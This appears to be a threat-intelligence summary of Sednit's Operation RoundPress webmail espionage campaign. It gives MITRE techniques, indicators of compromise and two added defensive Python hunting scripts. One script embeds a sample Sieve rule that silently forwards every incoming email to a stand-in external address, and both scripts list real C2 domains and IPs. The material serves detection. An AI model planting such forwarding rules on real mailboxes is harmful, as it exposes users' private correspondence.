Operation RoundPress

Operation RoundPress is a cyberespionage campaign by the Sednit group targeting high-value webmail servers via XSS vulnerabilities to steal confidential email data. This operation affects multiple webmail platforms including Roundcube, Horde, MDaemon, and Zimbra, primarily impacting governmental and defense sectors worldwide. #Sednit #Roundcube #Horde #MDaemon #Zimbra

Keypoints

  • Operation RoundPress uses spearphishing emails exploiting XSS vulnerabilities to inject malicious JavaScript into webmail pages.
  • In 2023, the operation targeted only Roundcube, expanding in 2024 to Horde, MDaemon (zero-day CVE-2024-11182), and Zimbra webmail software.
  • Victims mainly include governmental and defense organizations in Eastern Europe, with additional targets in Africa, Europe, and South America.
  • SpyPress JavaScript payloads (HORDE, MDAEMON, ROUNDCUBE, ZIMBRA) steal credentials, email messages, contacts, and even two-factor authentication secrets.
  • SpyPress.MDAEMON uniquely bypasses two-factor authentication by exfiltrating 2FA secrets and creating application passwords.
  • Payloads execute in the victim's browser when the malicious email is opened in a vulnerable webmail portal; some SpyPress.ROUNDCUBE samples additionally create Sieve rules that forward every incoming email to an attacker-controlled address.
  • Communication with command and control servers uses HTTPS POST requests with base64-encoded data for exfiltration.
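The Sieve forwarding rules mentioned above leave a persistent artefact on the mail server even after the JavaScript payload is gone, so they are worth hunting for directly. The script below is an added example, not code from the ESET report or from Roundcube: it scans Sieve scripts in the RFC 5228 syntax that the Roundcube managesieve plugin writes (for example a user's roundcube.sieve file under Dovecot) for `redirect` actions whose target is outside the organisation, and notes whether the redirect is unconditional (at the top level of the script, which is what "forward any incoming message" looks like). The internal domain set and the sample script are constructed for illustration.

```python
"""Hunt user Sieve scripts for externally-targeted redirect rules.

Added example (not ESET's or Roundcube's code). Assumes RFC 5228 Sieve
syntax such as the Roundcube managesieve plugin emits. INTERNAL_DOMAINS and
SAMPLE_SCRIPT are constructed for illustration.
"""
import re

# Hypothetical organisation domains; a redirect to any other domain is flagged.
INTERNAL_DOMAINS = {"example.gov"}

# RFC 5228 redirect action, with optional tagged arguments such as ":copy":
#   redirect "user@host";      redirect :copy "user@host";
REDIRECT_RE = re.compile(r'\bredirect\b(?:\s+:\w+)*\s+"([^"]+)"\s*;')


def strip_comments(script):
    """Drop '/* ... */' block comments and '#' line comments.

    Simplification: a '#' inside a quoted string would also be treated as a
    comment start; real Sieve scripts rarely contain one.
    """
    script = re.sub(r"/\*.*?\*/", "", script, flags=re.S)
    return re.sub(r"#[^\n]*", "", script)


def find_external_forwards(script):
    """Return [(target, unconditional), ...] for redirects to external domains.

    'unconditional' is True when the redirect sits outside every if-block,
    i.e. it applies to all incoming mail.
    """
    clean = strip_comments(script)
    hits = []
    for m in REDIRECT_RE.finditer(clean):
        target = m.group(1)
        domain = target.rsplit("@", 1)[-1].lower()
        if domain in INTERNAL_DOMAINS:
            continue
        before = clean[: m.start()]
        unconditional = before.count("{") == before.count("}")
        hits.append((target, unconditional))
    return hits


# Constructed sample: two benign user rules followed by a top-level
# forward-everything rule of the kind described for SpyPress.ROUNDCUBE.
SAMPLE_SCRIPT = """
# rule:[Newsletters]
require ["fileinto", "copy"];
if header :contains "subject" "newsletter" {
    fileinto "Newsletters";
}
# rule:[Copy to colleague]
if address :is "from" "boss@example.gov" {
    redirect :copy "colleague@example.gov";
}
# no condition: every incoming message is copied to an external mailbox
redirect :copy "collector@mail-service.example";
"""


def main():
    for target, unconditional in find_external_forwards(SAMPLE_SCRIPT):
        kind = "UNCONDITIONAL" if unconditional else "conditional"
        print(f"{kind} external forward -> {target}")


if __name__ == "__main__":
    main()
```

Run it against each user's active Sieve script (Dovecot keeps the active one as a symlink in the user's sieve directory); an unconditional external redirect that the user did not create is a strong indicator that the mailbox was compromised.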

MITRE Techniques

  • [T1583.001] Acquire Infrastructure: Domains – Sednit purchased domains at various registrars to support their operations (‘Sednit bought domains at various registrars’).
  • [T1583.004] Acquire Infrastructure: Server – Sednit rented servers at multiple hosting providers, including M247 (‘Sednit rented servers at M247 and other hosting providers’).
  • [T1587.004] Develop Capabilities: Exploits – Sednit developed or acquired XSS exploits targeting Roundcube, Zimbra, Horde, and MDaemon (‘Sednit developed (or acquired) XSS exploits for Roundcube, Zimbra, Horde, and MDaemon’).
  • [T1587.001] Develop Capabilities: Malware – Sednit developed JavaScript stealers SpyPress to harvest data from webmail servers (‘Sednit developed JavaScript stealers… to steal data from webmail servers’).
  • [T1190] Exploit Public-Facing Application – Sednit exploited known and zero-day vulnerabilities in webmail software to execute malicious JavaScript (‘Sednit exploited known and zero-day vulnerabilities… to execute JavaScript code’).
  • [T1203] Exploitation for Client Execution – SpyPress payloads execute when victims open malicious emails inside vulnerable webmail clients (‘SpyPress payloads are executed when a victim opens the malicious email’).
  • [T1027] Obfuscated Files or Information – SpyPress payloads are obfuscated using an unknown JavaScript obfuscator (‘SpyPress payloads are obfuscated with an unknown JavaScript obfuscator’).
  • [T1187] Forced Authentication – SpyPress payloads force victims to re-enter credentials by logging them out (‘SpyPress payloads can log out users to entice them into entering their credentials’).
  • [T1556.006] Modify Authentication Process: Multi-Factor Authentication – SpyPress.MDAEMON steals 2FA secrets and creates app passwords for bypass (‘SpyPress.MDAEMON can steal the 2FA token and create an application password’).
  • [T1087.003] Account Discovery: Email Account – SpyPress collects user contact lists and account information (‘SpyPress payloads get information about the email account, such as the contact list’).
  • [T1056.003] Input Capture: Web Portal Capture – SpyPress attempts to steal credentials via hidden input forms (‘SpyPress payloads try to steal webmail credentials by creating a hidden login form’).
  • [T1119] Automated Collection – SpyPress automates collection of credentials and emails (‘SpyPress payloads automatically collect credentials and email messages’).
  • [T1114.002] Email Collection: Remote Email Collection – SpyPress collects and exfiltrates emails from victim mailboxes remotely (‘SpyPress payloads collect and exfiltrate emails…’).
  • [T1114.003] Email Collection: Email Forwarding Rule – SpyPress.ROUNDCUBE creates Sieve rules to forward incoming emails to attackers (‘SpyPress.ROUNDCUBE adds a Sieve rule to forward any incoming email message’).
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communications are conducted using HTTPS (‘C&C communication is done via HTTPS’).
  • [T1071.003] Application Layer Protocol: Mail Protocols – Email forwarding exfiltration uses mail protocols (‘exfiltration is done via email’).
  • [T1132.001] Data Encoding: Standard Encoding – Data exfiltrated is base64 encoded (‘Data is base64 encoded before being sent to the C&C server’).
  • [T1020] Automated Exfiltration – SpyPress automatically exfiltrates data to C2 servers (‘SpyPress payloads automatically exfiltrate credentials and email messages’).
  • [T1041] Exfiltration Over C2 Channel – Data is exfiltrated over command and control channels (‘SpyPress payloads exfiltrate data over the C&C channel’).

Indicators of Compromise

  • [File Hashes] SpyPress malware and exploit samples – 41FE2EFB38E0C7DD10E6009A68BD26687D6DBF4C (SpyPress.ZIMBRA), 1078C587FE2B246D618AF74D157F941078477579 (SpyPress.ROUNDCUBE), 8EBBBC9EB54E216EFFB437A28B9F2C7C9DA3A0FA (CVE-2024-11182 exploit), and others.
  • [Email Addresses] Spearphishing sources – [email protected] (used in 2023 RoundPress campaigns), [email protected], and [email protected] (2024 campaigns targeting Ukrainian and Bulgarian victims).
  • [Domains] Command and Control infrastructure – ceriossl.info (45.138.87.250), global-world-news.net (77.243.181.238), sqj.fr (185.225.69.223), tgh24.xyz and tuo.world (193.29.104.152), jiaw.shop (91.237.124.164), hijx.xyz (89.44.9.74), ikses.net (111.90.151.167), and others.
  • [IP Addresses] Hosting C2 servers – 45.138.87.250, 77.243.181.238, 185.225.69.223, 193.29.104.152, 91.237.124.164, 89.44.9.74, 111.90.151.167, among others.
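Because SpyPress runs in the victim's browser, its HTTPS POST exfiltration leaves the network through whatever forward proxy the workstations use, which makes proxy logs the natural place to hunt with the domains and IPs above. The script below is an added example, not code from the ESET report: it parses a simplified, space-separated proxy log (timestamp, client IP, method, URL, status; the format and the lines are constructed for illustration), extracts the destination host, and flags any request whose host is one of the listed C2 IPs, domains, or a subdomain of one. The IOC set is the partial one reproduced on this page (the page's merged entry "tgh24.xyztuo.world" is read as the two domains tgh24.xyz and tuo.world); ESET's full list is longer.

```python
"""Hunt forward-proxy logs for browser traffic to RoundPress C2 hosts.

Added example (not ESET's code). Log format and SAMPLE_LOG are constructed:
  <timestamp> <client-ip> <method> <url-or-CONNECT-target> <status>
The IOC set is the partial one on this page.
"""
import ipaddress
from urllib.parse import urlsplit

# Domains from the page's IOC list; the merged token "tgh24.xyztuo.world"
# is taken to be tgh24.xyz and tuo.world.
C2_DOMAINS = {
    "ceriossl.info", "global-world-news.net", "sqj.fr", "tgh24.xyz",
    "tuo.world", "jiaw.shop", "hijx.xyz", "ikses.net",
}
C2_IPS = {
    "45.138.87.250", "77.243.181.238", "185.225.69.223", "193.29.104.152",
    "91.237.124.164", "89.44.9.74", "111.90.151.167",
}


def host_of(url):
    """Lowercase host from an absolute URL or a CONNECT 'host:port' target."""
    parts = urlsplit(url if "://" in url else "//" + url)
    return (parts.hostname or "").lower()


def is_c2_host(host):
    """True for a listed IP, a listed domain, or any subdomain of one."""
    try:
        return str(ipaddress.ip_address(host)) in C2_IPS
    except ValueError:
        pass  # not an IP literal; fall through to the domain check
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def hunt(log_lines):
    """Return one dict per log line whose destination is a C2 host."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line: skip rather than crash the hunt
        ts, client, method, url, status = fields[:5]
        host = host_of(url)
        if is_c2_host(host):
            hits.append({"time": ts, "client": client, "method": method,
                         "host": host, "status": status})
    return hits


# Constructed sample: one workstation reads webmail, then POSTs to a C2
# domain and opens a TLS tunnel to a C2 IP; another hits a C2 subdomain;
# the rest is benign, including a look-alike domain that must not match.
SAMPLE_LOG = """\
2024-09-12T08:14:03Z 10.20.30.41 GET https://webmail.example.gov/?_task=mail 200
2024-09-12T08:14:05Z 10.20.30.41 POST https://ceriossl.info/ 200
2024-09-12T08:14:05Z 10.20.30.41 CONNECT 45.138.87.250:443 200
2024-09-12T08:14:09Z 10.20.30.42 GET https://www.global-world-news.net/news 200
2024-09-12T08:15:11Z 10.20.30.43 GET https://example.com/ 200
2024-09-12T08:15:12Z 10.20.30.43 GET https://notsqj.fr/ 200
""".splitlines()


def main():
    for hit in hunt(SAMPLE_LOG):
        # POSTs deserve first attention: that is the exfiltration direction.
        print(f"{hit['time']} {hit['client']} {hit['method']:7} {hit['host']}")


if __name__ == "__main__":
    main()
```

A client that appears here shortly after a request to the organisation's own webmail host is the pattern to look for; triage the POSTs first, since that is the direction in which SpyPress sends its base64-encoded data.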

Read more: https://www.welivesecurity.com/en/eset-research/operation-roundpress/